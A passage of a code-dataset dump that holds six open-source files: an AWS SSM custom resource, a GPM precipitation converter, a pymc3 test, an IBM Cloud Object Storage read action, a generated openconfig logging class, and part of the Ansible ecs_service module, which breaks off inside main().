Dataset schema (29 columns; ⌀ marks nullable columns):

| Column | Type | Min | Max | Nullable |
|---|---|---|---|---|
| hexsha | string (length) | 40 | 40 | |
| size | int64 | 3 | 1.03M | |
| ext | string (10 classes) | | | |
| lang | string (1 class) | | | |
| max_stars_repo_path | string (length) | 3 | 972 | |
| max_stars_repo_name | string (length) | 6 | 130 | |
| max_stars_repo_head_hexsha | string (length) | 40 | 78 | |
| max_stars_repo_licenses | list (length) | 1 | 10 | |
| max_stars_count | int64 | 1 | 191k | ⌀ |
| max_stars_repo_stars_event_min_datetime | string (length) | 24 | 24 | ⌀ |
| max_stars_repo_stars_event_max_datetime | string (length) | 24 | 24 | ⌀ |
| max_issues_repo_path | string (length) | 3 | 972 | |
| max_issues_repo_name | string (length) | 6 | 130 | |
| max_issues_repo_head_hexsha | string (length) | 40 | 78 | |
| max_issues_repo_licenses | list (length) | 1 | 10 | |
| max_issues_count | int64 | 1 | 116k | ⌀ |
| max_issues_repo_issues_event_min_datetime | string (length) | 24 | 24 | ⌀ |
| max_issues_repo_issues_event_max_datetime | string (length) | 24 | 24 | ⌀ |
| max_forks_repo_path | string (length) | 3 | 972 | |
| max_forks_repo_name | string (length) | 6 | 130 | |
| max_forks_repo_head_hexsha | string (length) | 40 | 78 | |
| max_forks_repo_licenses | list (length) | 1 | 10 | |
| max_forks_count | int64 | 1 | 105k | ⌀ |
| max_forks_repo_forks_event_min_datetime | string (length) | 24 | 24 | ⌀ |
| max_forks_repo_forks_event_max_datetime | string (length) | 24 | 24 | ⌀ |
| content | string (length) | 3 | 1.03M | |
| avg_line_length | float64 | 1.13 | 941k | |
| max_line_length | int64 | 2 | 941k | |
| alphanum_fraction | float64 | 0 | 1 | |

Each record below lists its metadata cells, in the column order above, on a single pipe-delimited line, followed by the file `content`, and closes with a pipe-delimited line holding `avg_line_length`, `max_line_length`, and `alphanum_fraction`.
| 5025d421c224ba543b5beb63426e24bac5a64bd7 | 1,869 | py | Python | source/samples/write-api-to-ssm-custom-resource/index.py | s3799570/P000075CSITCP | dcf9f388a22baffc99e01b445e5d95089a896113 | ["Apache-2.0"] | 82 | 2018-07-24T18:37:07.000Z | 2021-08-23T14:46:07.000Z | source/samples/write-api-to-ssm-custom-resource/index.py | s3799570/P000075CSITCP | dcf9f388a22baffc99e01b445e5d95089a896113 | ["Apache-2.0"] | 17 | 2018-08-14T16:16:47.000Z | 2021-08-31T21:19:21.000Z | source/samples/write-api-to-ssm-custom-resource/index.py | s3799570/P000075CSITCP | dcf9f388a22baffc99e01b445e5d95089a896113 | ["Apache-2.0"] | 42 | 2018-07-25T19:21:18.000Z | 2021-09-19T11:19:21.000Z |

# -*- coding: utf-8 -*-
####################################################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License Version 2.0 (the 'License'). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://www.apache.org/licenses/
#
# or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions
# and limitations under the License.
####################################################################################################################/
# @author Solution Builders
from crhelper import CfnResource
import boto3
helper = CfnResource()
ssm = boto3.client("ssm")
@helper.create
def create_ssm(event, _):
ssm_key_name = str(event["ResourceProperties"]["SSMKeyNameAPI"])
api_key = str(event["ResourceProperties"]["APIKey"])
ssm.put_parameter(Name=ssm_key_name, Value=api_key, Type="SecureString")
helper.Data.update({"APIKey": api_key})
helper.Data.update({"SSMKeyNameAPI": ssm_key_name})
@helper.update
def update_ssm(event, _):
ssm_key_name = str(event["ResourceProperties"]["SSMKeyNameAPI"])
api_key = str(event["ResourceProperties"]["APIKey"])
ssm.put_parameter(Name=ssm_key_name, Value=api_key, Type="SecureString", Overwrite=True)
helper.Data.update({"APIKey": api_key})
helper.Data.update({"SSMKeyNameAPI": ssm_key_name})
@helper.delete
def delete_ssm(event, _):
ssm_key_name = str(event["ResourceProperties"]["SSMKeyNameAPI"])
ssm.delete_parameter(Name=ssm_key_name)
def lambda_handler(event, context):
helper(event, context)

| 36.647059 | 117 | 0.642055 |
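
Note on the record above: `index.py` is a CloudFormation custom-resource handler built on `crhelper`. A minimal sketch of the Create event it expects is below; the field names come from the handler code, while the parameter name and key value are hypothetical, and calling `create_ssm` outside CloudFormation would issue a real `ssm.put_parameter` request unless the client is stubbed.

```python
# Hypothetical Create event for the SSM custom-resource handler above.
event = {
    "RequestType": "Create",
    "ResourceProperties": {
        "SSMKeyNameAPI": "/my-app/api-key",   # assumed SSM parameter name
        "APIKey": "example-api-key-value",    # assumed secret to store
    },
}

# create_ssm(event, None)  # would store APIKey as a SecureString under SSMKeyNameAPI
```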
| e217dd45a5e29769ca79a585602031ba927b909c | 2,138 | py | Python | dataset/GPM/gpm_transformer.py | prl900/unet_him8_gpm | 5e27510b1c3eb76e57461316f25240231cbc3c37 | ["Apache-2.0"] | null | null | null | dataset/GPM/gpm_transformer.py | prl900/unet_him8_gpm | 5e27510b1c3eb76e57461316f25240231cbc3c37 | ["Apache-2.0"] | null | null | null | dataset/GPM/gpm_transformer.py | prl900/unet_him8_gpm | 5e27510b1c3eb76e57461316f25240231cbc3c37 | ["Apache-2.0"] | 1 | 2020-06-20T01:15:05.000Z | 2020-06-20T01:15:05.000Z |

#!/g/data/v10/public/modules/dea-env/20181015/bin/python
import argparse
import datetime
import netCDF4
import h5py
import numpy as np
def pack(data, date, dst):
with netCDF4.Dataset(dst, 'w', format='NETCDF4_CLASSIC') as ds:
setattr(ds, "date_created", datetime.datetime.now().strftime("%Y%m%dT%H%M%S"))
ds.createDimension("time", 1)
ds.createDimension("latitude", data.shape[0])
ds.createDimension("longitude", data.shape[1])
var = ds.createVariable("time", "f8", ("time",))
var.units = "seconds since 1970-01-01 00:00:00.0"
var.calendar = "standard"
var.long_name = "Time, unix time-stamp"
var.standard_name = "time"
var[:] = netCDF4.date2num([date], units="seconds since 1970-01-01 00:00:00.0", calendar="standard")
var = ds.createVariable("longitude", "f8", ("longitude",))
var.units = "degrees_east"
var.long_name = "longitude"
var[:] = np.linspace(-179.95, 179.95, 3600)
var = ds.createVariable("latitude", "f8", ("latitude",))
var.units = "degrees_north"
var.long_name = "latitude"
var[:] = np.linspace(89.95, -89.95, 1800)
var = ds.createVariable("precipitationCal", "f4", ("time", "latitude", "longitude"), fill_value=-9999.9)
var.long_name = "Precipitation Calibrated"
var.units = 'mm/h'
var[:] = data[None,...]
def get_prec(f_path):
with h5py.File(f_path, mode='r') as f:
prec = f['Grid']['precipitationCal'][:].T[::-1, :]
prec[prec == -9999.9] = np.nan
return prec
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="""GPM HDF-EOS to netCDF4 converter""")
parser.add_argument('-src', '--source', required=True, type=str, help="Full path to source.")
parser.add_argument('-dst', '--destination', required=True, type=str, help="Full path to destination.")
args = parser.parse_args()
date = datetime.datetime.strptime(args.source[74:82]+args.source[84:88], '%Y%m%d%H%M')
print(date)
prec = get_prec(args.source)
pack(prec, date, args.destination)

| 36.862069 | 112 | 0.621141 |
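
Note on the record above: `gpm_transformer.py` converts a GPM precipitation HDF5 file to a CF-style netCDF4 file. The script derives the timestamp from fixed character offsets in the source path, so the sketch below passes the date explicitly instead; the file names are hypothetical and `get_prec`/`pack` are assumed to be imported from the module.

```python
import datetime

# Hypothetical input/output paths; get_prec() and pack() come from the module above.
src = "3B-HHR.MS.MRG.3IMERG.20200101-S000000-E002959.0000.V06B.HDF5"
dst = "gpm_20200101T0000.nc"

prec = get_prec(src)                        # latitude x longitude grid, NaN for fill values
date = datetime.datetime(2020, 1, 1, 0, 0)  # timestamp supplied by hand
pack(prec, date, dst)                       # writes time/latitude/longitude/precipitationCal
```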
| d1949ef60ff597915efb5df1a788eb1adc9b8e1e | 1,509 | py | Python | pymc3_ext/tests/test_shared.py | wlad111/pymc3 | 43432834be5bbca72caa32d40a848515eea554a8 | ["Apache-2.0"] | null | null | null | pymc3_ext/tests/test_shared.py | wlad111/pymc3 | 43432834be5bbca72caa32d40a848515eea554a8 | ["Apache-2.0"] | null | null | null | pymc3_ext/tests/test_shared.py | wlad111/pymc3 | 43432834be5bbca72caa32d40a848515eea554a8 | ["Apache-2.0"] | null | null | null |

import pymc3_ext as pm
from .helpers import SeededTest
import numpy as np
import theano
class TestShared(SeededTest):
def test_deterministic(self):
with pm.Model() as model:
data_values = np.array([.5, .4, 5, 2])
X = theano.shared(np.asarray(data_values, dtype=theano.config.floatX), borrow=True)
pm.Normal('y', 0, 1, observed=X)
model.logp(model.test_point)
def test_sample(self):
x = np.random.normal(size=100)
y = x + np.random.normal(scale=1e-2, size=100)
x_pred = np.linspace(-3, 3, 200)
x_shared = theano.shared(x)
with pm.Model() as model:
b = pm.Normal('b', 0., 10.)
pm.Normal('obs', b * x_shared, np.sqrt(1e-2), observed=y)
prior_trace0 = pm.sample_prior_predictive(1000)
trace = pm.sample(1000, init=None, progressbar=False)
pp_trace0 = pm.sample_posterior_predictive(trace, 1000)
x_shared.set_value(x_pred)
prior_trace1 = pm.sample_prior_predictive(1000)
pp_trace1 = pm.sample_posterior_predictive(trace, 1000)
assert prior_trace0['b'].shape == (1000,)
assert prior_trace0['obs'].shape == (1000, 100)
np.testing.assert_allclose(x, pp_trace0['obs'].mean(axis=0), atol=1e-1)
assert prior_trace1['b'].shape == (1000,)
assert prior_trace1['obs'].shape == (1000, 200)
np.testing.assert_allclose(x_pred, pp_trace1['obs'].mean(axis=0), atol=1e-1)

| 35.928571 | 95 | 0.614977 |
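
Note on the record above: `test_shared.py` exercises the shared-data pattern, where a `theano.shared` predictor is swapped out after sampling so posterior predictions can be generated for new inputs. A minimal sketch of that pattern, assuming plain `pymc3`/`theano` rather than the `pymc3_ext` fork used in the test:

```python
import numpy as np
import pymc3 as pm
import theano

x_train = np.random.normal(size=100)
y_train = 2.0 * x_train + np.random.normal(scale=0.1, size=100)
x_shared = theano.shared(x_train)

with pm.Model():
    b = pm.Normal("b", 0.0, 10.0)
    pm.Normal("obs", b * x_shared, 0.1, observed=y_train)
    trace = pm.sample(500, progressbar=False)

    x_shared.set_value(np.linspace(-3, 3, 50))          # swap in new predictor values
    preds = pm.sample_posterior_predictive(trace, 500)  # preds["obs"].shape == (500, 50)
```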
| 3c6db3faa39258948006b9b91d7cb92af860fc05 | 2,261 | py | Python | runtimes/python/actions/object-read.py | jasonpet/package-cloud-object-storage | e4d1b4a35c0ea8602abff4618c5349ecaea631c2 | ["Apache-2.0"] | 2 | 2018-04-14T15:54:55.000Z | 2018-05-03T20:57:00.000Z | runtimes/python/actions/object-read.py | jasonpet/package-cloud-object-storage | e4d1b4a35c0ea8602abff4618c5349ecaea631c2 | ["Apache-2.0"] | 24 | 2018-04-18T19:32:56.000Z | 2019-09-05T13:49:35.000Z | runtimes/python/actions/object-read.py | jasonpet/package-cloud-object-storage | e4d1b4a35c0ea8602abff4618c5349ecaea631c2 | ["Apache-2.0"] | 8 | 2018-04-04T16:30:09.000Z | 2019-11-18T09:44:50.000Z |

# This action will read from Cloud Object Storage. If the Cloud Object Storage
# service is not bound to this action or to the package containing this action,
# then you must provide the service information as argument input to this function.
# Cloud Functions actions accept a single parameter, which must be a JSON object.
#
# In this case, the args variable will look like:
# {
# "bucket": "your COS bucket name",
# "key": "Name of the object to read"
# }
import sys
import json
import os
import ibm_boto3
from ibm_botocore.client import Config, ClientError
def main(args):
resultsGetParams = getParamsCOS(args)
cos = resultsGetParams.get('cos')
params = resultsGetParams.get('params')
bucket = params.get('bucket')
key = params.get('key')
try:
if not bucket or not key or not cos:
raise ValueError("bucket name, key, and apikey are required for this operation.")
except ValueError as e:
print(e)
raise
try:
object = cos.get_object(
Bucket=bucket,
Key=key,
)
except ClientError as e:
print(e)
raise e
return {
'bucket':bucket,
'key':key,
'body': str(object['Body'].read())
}
def getParamsCOS(args):
endpoint = args.get('endpoint','https://s3.us.cloud-object-storage.appdomain.cloud')
if not (endpoint.startswith("https://") or endpoint.startswith("http://")) : endpoint = "https://" + endpoint
api_key_id = args.get('apikey', args.get('apiKeyId', args.get('__bx_creds', {}).get('cloud-object-storage', {}).get('apikey', os.environ.get('__OW_IAM_NAMESPACE_API_KEY') or '')))
service_instance_id = args.get('resource_instance_id', args.get('serviceInstanceId', args.get('__bx_creds', {}).get('cloud-object-storage', {}).get('resource_instance_id', '')))
ibm_auth_endpoint = args.get('ibmAuthEndpoint', 'https://iam.cloud.ibm.com/identity/token')
params = {}
params['bucket'] = args.get('bucket')
params['key'] = args.get('key')
if not api_key_id:
return {'cos': None, 'params':params}
cos = ibm_boto3.client('s3',
ibm_api_key_id=api_key_id,
ibm_service_instance_id=service_instance_id,
ibm_auth_endpoint=ibm_auth_endpoint,
config=Config(signature_version='oauth'),
endpoint_url=endpoint)
return {'cos':cos, 'params':params}

| 33.746269 | 182 | 0.697479 |
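
Note on the record above: `object-read.py` is an IBM Cloud Functions action that reads one object from Cloud Object Storage. When the COS service is not bound to the action, credentials must be passed in the argument dict; a hypothetical direct invocation of its `main()` (all values are placeholders) looks like this:

```python
# Placeholder parameters for a direct call to main() from the action above.
args = {
    "bucket": "my-example-bucket",
    "key": "hello.txt",
    "apikey": "<IAM API key>",
    "resource_instance_id": "<COS service instance CRN>",
    "endpoint": "s3.us.cloud-object-storage.appdomain.cloud",  # scheme is added automatically
}

# result = main(args)  # -> {"bucket": ..., "key": ..., "body": "<object contents>"}
```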
| f40f577f0bba8f847bb76a90a1206419dab859ad | 6,947 | py | Python | napalm_yang/models/openconfig/system/logging/remote_servers/remote_server/selectors/__init__.py | ckishimo/napalm-yang | 8f2bd907bd3afcde3c2f8e985192de74748baf6c | ["Apache-2.0"] | 64 | 2016-10-20T15:47:18.000Z | 2021-11-11T11:57:32.000Z | napalm_yang/models/openconfig/system/logging/remote_servers/remote_server/selectors/__init__.py | ckishimo/napalm-yang | 8f2bd907bd3afcde3c2f8e985192de74748baf6c | ["Apache-2.0"] | 126 | 2016-10-05T10:36:14.000Z | 2019-05-15T08:43:23.000Z | napalm_yang/models/openconfig/system/logging/remote_servers/remote_server/selectors/__init__.py | ckishimo/napalm-yang | 8f2bd907bd3afcde3c2f8e985192de74748baf6c | ["Apache-2.0"] | 63 | 2016-11-07T15:23:08.000Z | 2021-09-22T14:41:16.000Z |

# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import selector
class selectors(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-system - based on the path /system/logging/remote-servers/remote-server/selectors. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Enclosing container
"""
__slots__ = ("_path_helper", "_extmethods", "__selector")
_yang_name = "selectors"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__selector = YANGDynClass(
base=YANGListType(
"facility severity",
selector.selector,
yang_name="selector",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="facility severity",
extensions=None,
),
is_container="list",
yang_name="selector",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="list",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return ["system", "logging", "remote-servers", "remote-server", "selectors"]
def _get_selector(self):
"""
Getter method for selector, mapped from YANG variable /system/logging/remote_servers/remote_server/selectors/selector (list)
YANG Description: List of selectors for log messages
"""
return self.__selector
def _set_selector(self, v, load=False):
"""
Setter method for selector, mapped from YANG variable /system/logging/remote_servers/remote_server/selectors/selector (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_selector is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_selector() directly.
YANG Description: List of selectors for log messages
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGListType(
"facility severity",
selector.selector,
yang_name="selector",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="facility severity",
extensions=None,
),
is_container="list",
yang_name="selector",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="list",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """selector must be of a type compatible with list""",
"defined-type": "list",
"generated-type": """YANGDynClass(base=YANGListType("facility severity",selector.selector, yang_name="selector", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='facility severity', extensions=None), is_container='list', yang_name="selector", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='list', is_config=True)""",
}
)
self.__selector = t
if hasattr(self, "_set"):
self._set()
def _unset_selector(self):
self.__selector = YANGDynClass(
base=YANGListType(
"facility severity",
selector.selector,
yang_name="selector",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="facility severity",
extensions=None,
),
is_container="list",
yang_name="selector",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="list",
is_config=True,
)
selector = __builtin__.property(_get_selector, _set_selector)
_pyangbind_elements = OrderedDict([("selector", selector)])

| 37.149733 | 542 | 0.590903 |
| 27581a7e599116a761cfabffb9dcc75b5bf52a66 | 25,229 | py | Python | ansible/my_env/lib/python2.7/site-packages/ansible/modules/cloud/amazon/ecs_service.py | otus-devops-2019-02/yyashkin_infra | 0cd0c003884155ac922e3e301305ac202de7028c | ["MIT"] | 1 | 2019-04-16T21:23:15.000Z | 2019-04-16T21:23:15.000Z | ansible/my_env/lib/python2.7/site-packages/ansible/modules/cloud/amazon/ecs_service.py | otus-devops-2019-02/yyashkin_infra | 0cd0c003884155ac922e3e301305ac202de7028c | ["MIT"] | 5 | 2020-02-26T20:10:50.000Z | 2021-09-23T23:23:18.000Z | ansible/my_env/lib/python2.7/site-packages/ansible/modules/cloud/amazon/ecs_service.py | otus-devops-2019-02/yyashkin_infra | 0cd0c003884155ac922e3e301305ac202de7028c | ["MIT"] | 1 | 2020-02-13T14:24:57.000Z | 2020-02-13T14:24:57.000Z |

#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ecs_service
short_description: create, terminate, start or stop a service in ecs
description:
- Creates or terminates ecs services.
notes:
- the service role specified must be assumable (i.e. have a trust relationship for the ecs service, ecs.amazonaws.com)
- for details of the parameters and returns see U(https://boto3.readthedocs.io/en/latest/reference/services/ecs.html)
- An IAM role must have been previously created
version_added: "2.1"
author:
- "Mark Chance (@java1guy)"
- "Darek Kaczynski (@kaczynskid)"
- "Stephane Maarek (@simplesteph)"
- "Zac Blazic (@zacblazic)"
requirements: [ json, botocore, boto3 ]
options:
state:
description:
- The desired state of the service
required: true
choices: ["present", "absent", "deleting"]
name:
description:
- The name of the service
required: true
cluster:
description:
- The name of the cluster in which the service exists
required: false
task_definition:
description:
- The task definition the service will run. This parameter is required when state=present
required: false
load_balancers:
description:
- The list of ELBs defined for this service
required: false
desired_count:
description:
- The count of how many instances of the service. This parameter is required when state=present
required: false
client_token:
description:
- Unique, case-sensitive identifier you provide to ensure the idempotency of the request. Up to 32 ASCII characters are allowed.
required: false
role:
description:
- The name or full Amazon Resource Name (ARN) of the IAM role that allows your Amazon ECS container agent to make calls to your load balancer
on your behalf. This parameter is only required if you are using a load balancer with your service, in a network mode other than `awsvpc`.
required: false
delay:
description:
- The time to wait before checking that the service is available
required: false
default: 10
repeat:
description:
- The number of times to check that the service is available
required: false
default: 10
deployment_configuration:
description:
- Optional parameters that control the deployment_configuration; format is '{"maximum_percent":<integer>, "minimum_healthy_percent":<integer>}
required: false
version_added: 2.3
placement_constraints:
description:
- The placement constraints for the tasks in the service
required: false
version_added: 2.4
placement_strategy:
description:
- The placement strategy objects to use for tasks in your service. You can specify a maximum of 5 strategy rules per service
required: false
version_added: 2.4
network_configuration:
description:
- network configuration of the service. Only applicable for task definitions created with C(awsvpc) I(network_mode).
- assign_public_ip requires botocore >= 1.8.4
suboptions:
subnets:
description:
- A list of subnet IDs to associate with the task
version_added: 2.6
security_groups:
description:
- A list of security group names or group IDs to associate with the task
version_added: 2.6
assign_public_ip:
description:
- Whether the task's elastic network interface receives a public IP address. This option requires botocore >= 1.8.4.
type: bool
version_added: 2.7
launch_type:
description:
- The launch type on which to run your service
required: false
version_added: 2.7
choices: ["EC2", "FARGATE"]
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
- ecs_service:
state: present
name: console-test-service
cluster: new_cluster
task_definition: 'new_cluster-task:1'
desired_count: 0
# Basic provisioning example
- ecs_service:
name: default
state: present
cluster: new_cluster
- name: create ECS service on VPC network
ecs_service:
state: present
name: console-test-service
cluster: new_cluster
task_definition: 'new_cluster-task:1'
desired_count: 0
network_configuration:
subnets:
- subnet-abcd1234
security_groups:
- sg-aaaa1111
- my_security_group
# Simple example to delete
- ecs_service:
name: default
state: absent
cluster: new_cluster
# With custom deployment configuration (added in version 2.3), placement constraints and strategy (added in version 2.4)
- ecs_service:
state: present
name: test-service
cluster: test-cluster
task_definition: test-task-definition
desired_count: 3
deployment_configuration:
minimum_healthy_percent: 75
maximum_percent: 150
placement_constraints:
- type: memberOf
expression: 'attribute:flavor==test'
placement_strategy:
- type: binpack
field: memory
'''
RETURN = '''
service:
description: Details of created service.
returned: when creating a service
type: complex
contains:
clusterArn:
description: The Amazon Resource Name (ARN) of the of the cluster that hosts the service.
returned: always
type: string
desiredCount:
description: The desired number of instantiations of the task definition to keep running on the service.
returned: always
type: int
loadBalancers:
description: A list of load balancer objects
returned: always
type: complex
contains:
loadBalancerName:
description: the name
returned: always
type: string
containerName:
description: The name of the container to associate with the load balancer.
returned: always
type: string
containerPort:
description: The port on the container to associate with the load balancer.
returned: always
type: int
pendingCount:
description: The number of tasks in the cluster that are in the PENDING state.
returned: always
type: int
runningCount:
description: The number of tasks in the cluster that are in the RUNNING state.
returned: always
type: int
serviceArn:
description: The Amazon Resource Name (ARN) that identifies the service. The ARN contains the arn:aws:ecs namespace, followed by the region
of the service, the AWS account ID of the service owner, the service namespace, and then the service name. For example,
arn:aws:ecs:region :012345678910 :service/my-service .
returned: always
type: string
serviceName:
description: A user-generated string used to identify the service
returned: always
type: string
status:
description: The valid values are ACTIVE, DRAINING, or INACTIVE.
returned: always
type: string
taskDefinition:
description: The ARN of a task definition to use for tasks in the service.
returned: always
type: string
deployments:
description: list of service deployments
returned: always
type: list of complex
deploymentConfiguration:
description: dictionary of deploymentConfiguration
returned: always
type: complex
contains:
maximumPercent:
description: maximumPercent param
returned: always
type: int
minimumHealthyPercent:
description: minimumHealthyPercent param
returned: always
type: int
events:
description: list of service events
returned: always
type: list of complex
placementConstraints:
description: List of placement constraints objects
returned: always
type: list of complex
contains:
type:
description: The type of constraint. Valid values are distinctInstance and memberOf.
returned: always
type: string
expression:
description: A cluster query language expression to apply to the constraint. Note you cannot specify an expression if the constraint type is
distinctInstance.
returned: always
type: string
placementStrategy:
description: List of placement strategy objects
returned: always
type: list of complex
contains:
type:
description: The type of placement strategy. Valid values are random, spread and binpack.
returned: always
type: string
field:
description: The field to apply the placement strategy against. For the spread placement strategy, valid values are instanceId
(or host, which has the same effect), or any platform or custom attribute that is applied to a container instance,
such as attribute:ecs.availability-zone. For the binpack placement strategy, valid values are CPU and MEMORY.
returned: always
type: string
ansible_facts:
description: Facts about deleted service.
returned: when deleting a service
type: complex
contains:
service:
description: Details of deleted service in the same structure described above for service creation.
returned: when service existed and was deleted
type: complex
'''
import time
DEPLOYMENT_CONFIGURATION_TYPE_MAP = {
'maximum_percent': 'int',
'minimum_healthy_percent': 'int'
}
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import ec2_argument_spec
from ansible.module_utils.ec2 import snake_dict_to_camel_dict, map_complex_type, get_ec2_security_group_ids_from_names
try:
import botocore
except ImportError:
pass # handled by AnsibleAWSModule
class EcsServiceManager:
"""Handles ECS Services"""
def __init__(self, module):
self.module = module
self.ecs = module.client('ecs')
self.ec2 = module.client('ec2')
def format_network_configuration(self, network_config):
result = dict()
if network_config['subnets'] is not None:
result['subnets'] = network_config['subnets']
else:
self.module.fail_json(msg="Network configuration must include subnets")
if network_config['security_groups'] is not None:
groups = network_config['security_groups']
if any(not sg.startswith('sg-') for sg in groups):
try:
vpc_id = self.ec2.describe_subnets(SubnetIds=[result['subnets'][0]])['Subnets'][0]['VpcId']
groups = get_ec2_security_group_ids_from_names(groups, self.ec2, vpc_id)
except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
self.module.fail_json_aws(e, msg="Couldn't look up security groups")
result['securityGroups'] = groups
if network_config['assign_public_ip'] is not None:
if self.module.botocore_at_least('1.8.4'):
if network_config['assign_public_ip'] is True:
result['assignPublicIp'] = "ENABLED"
else:
result['assignPublicIp'] = "DISABLED"
else:
self.module.fail_json(msg='botocore needs to be version 1.8.4 or higher to use assign_public_ip in network_configuration')
return dict(awsvpcConfiguration=result)
def find_in_array(self, array_of_services, service_name, field_name='serviceArn'):
for c in array_of_services:
if c[field_name].endswith(service_name):
return c
return None
def describe_service(self, cluster_name, service_name):
response = self.ecs.describe_services(
cluster=cluster_name,
services=[service_name])
msg = ''
if len(response['failures']) > 0:
c = self.find_in_array(response['failures'], service_name, 'arn')
msg += ", failure reason is " + c['reason']
if c and c['reason'] == 'MISSING':
return None
# fall thru and look through found ones
if len(response['services']) > 0:
c = self.find_in_array(response['services'], service_name)
if c:
return c
raise Exception("Unknown problem describing service %s." % service_name)
def is_matching_service(self, expected, existing):
if expected['task_definition'] != existing['taskDefinition']:
return False
if (expected['load_balancers'] or []) != existing['loadBalancers']:
return False
if (expected['desired_count'] or 0) != existing['desiredCount']:
return False
return True
def create_service(self, service_name, cluster_name, task_definition, load_balancers,
desired_count, client_token, role, deployment_configuration,
placement_constraints, placement_strategy, network_configuration,
launch_type):
params = dict(
cluster=cluster_name,
serviceName=service_name,
taskDefinition=task_definition,
loadBalancers=load_balancers,
desiredCount=desired_count,
clientToken=client_token,
role=role,
deploymentConfiguration=deployment_configuration,
placementConstraints=placement_constraints,
placementStrategy=placement_strategy
)
if network_configuration:
params['networkConfiguration'] = network_configuration
if launch_type:
params['launchType'] = launch_type
response = self.ecs.create_service(**params)
return self.jsonize(response['service'])
def update_service(self, service_name, cluster_name, task_definition,
desired_count, deployment_configuration, network_configuration):
params = dict(
cluster=cluster_name,
service=service_name,
taskDefinition=task_definition,
desiredCount=desired_count,
deploymentConfiguration=deployment_configuration)
if network_configuration:
params['networkConfiguration'] = network_configuration
response = self.ecs.update_service(**params)
return self.jsonize(response['service'])
def jsonize(self, service):
# some fields are datetime which is not JSON serializable
# make them strings
if 'createdAt' in service:
service['createdAt'] = str(service['createdAt'])
if 'deployments' in service:
for d in service['deployments']:
if 'createdAt' in d:
d['createdAt'] = str(d['createdAt'])
if 'updatedAt' in d:
d['updatedAt'] = str(d['updatedAt'])
if 'events' in service:
for e in service['events']:
if 'createdAt' in e:
e['createdAt'] = str(e['createdAt'])
return service
def delete_service(self, service, cluster=None):
return self.ecs.delete_service(cluster=cluster, service=service)
def ecs_api_handles_network_configuration(self):
from distutils.version import LooseVersion
# There doesn't seem to be a nice way to inspect botocore to look
# for attributes (and networkConfiguration is not an explicit argument
# to e.g. ecs.run_task, it's just passed as a keyword argument)
return LooseVersion(botocore.__version__) >= LooseVersion('1.7.44')
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state=dict(required=True, choices=['present', 'absent', 'deleting']),
name=dict(required=True, type='str'),
cluster=dict(required=False, type='str'),
task_definition=dict(required=False, type='str'),
load_balancers=dict(required=False, default=[], type='list'),
desired_count=dict(required=False, type='int'),
client_token=dict(required=False, default='', type='str'),
role=dict(required=False, default='', type='str'),
delay=dict(required=False, type='int', default=10),
